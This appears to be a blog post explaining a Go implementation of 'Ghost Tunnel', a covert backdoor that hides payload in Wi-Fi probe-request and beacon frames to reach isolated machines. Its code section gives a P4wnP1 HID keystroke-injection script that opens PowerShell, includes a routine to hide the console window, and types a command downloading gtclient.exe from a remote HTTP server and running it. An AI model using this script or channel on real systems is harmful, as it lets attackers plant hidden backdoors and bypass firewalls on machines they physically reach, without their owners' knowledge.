Sign In

  • Username:
  • Password:

Upload File

  •  

Ghost Tunnel Realization in Go

Ghost Tunnel is a covert backdoor transmission method, hiding payload in 802.11 Probe-Request and Beacon frames. As it is in the first 3 steps connecting to an AP, it can transfer payload in isolated environments(need physical access first) and bypass firewall. In P4wnP1, it is called WiFi Covert Channel.

To know the principle better, I wrote a Go version.

Principle

To enhance user experience, our terminals will send probe-request packets to find nearby APs, and APs will respond beacon frames showing they are ready for connection. This process is called active scan.

In this process, we can control the SSID field and Vendor-Specific Information field, 32 bytes and 255 bytes, enough for payload.

So we can set up an evil AP, sniffing probe-request and sending back beacon frames to control the target.

Realization

Server

Just see the code, very easy to understand.

Client

Due to the privilege, we cannot do the same thing as the server side. But we have a better choice - system native WiFi api. Like on Windows, we can directly call WlanGetNetworkBssList and WlanScan from user space.

In a real event, how to put malware to the client is a big concern(plug a USB disk and click to copy is too ugly…). Thanks to the P4wnP1, we can use HID attack, especially his hidDownAndExec script to transfer our powershell payload, 32Kb/s!

For example, you can use a powershell script, writing the malware to a local exe from base64, and delete it when receive quit command. But maybe the fastest way is to download the client.exe from P4wnP1’s HTTP Server, like this:

// sets typing speed as fast as possible
function fast() {
  typingSpeed(0,0)
}

// Open an interactive PowerShell console (host architecture)
function startPS() {
    press("GUI r");
    delay(500);
    type("powershell\n")
}

// Hide an already opened PowerShell console, but keep input focus, to gon on typing
function hidePS() {
    type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)')
      press("ENTER");
}
layout('us')
fast();

startPS();
delay(1000);
//hidePS();
delay(500)
type("(New-Object System.Net.WebClient).DownloadFile('http://172.16.0.1:8000/gtclient.exe','gtclient.exe');.\\gtclient.exe")
delay(500);
press("ENTER")

Actually, memory injection is more graceful, but I have tried powersploit’s Invoke-RelectionPEInjection script many times without success, maybe you could leave me a note.

Demo

From P4wnP1

From 360

From me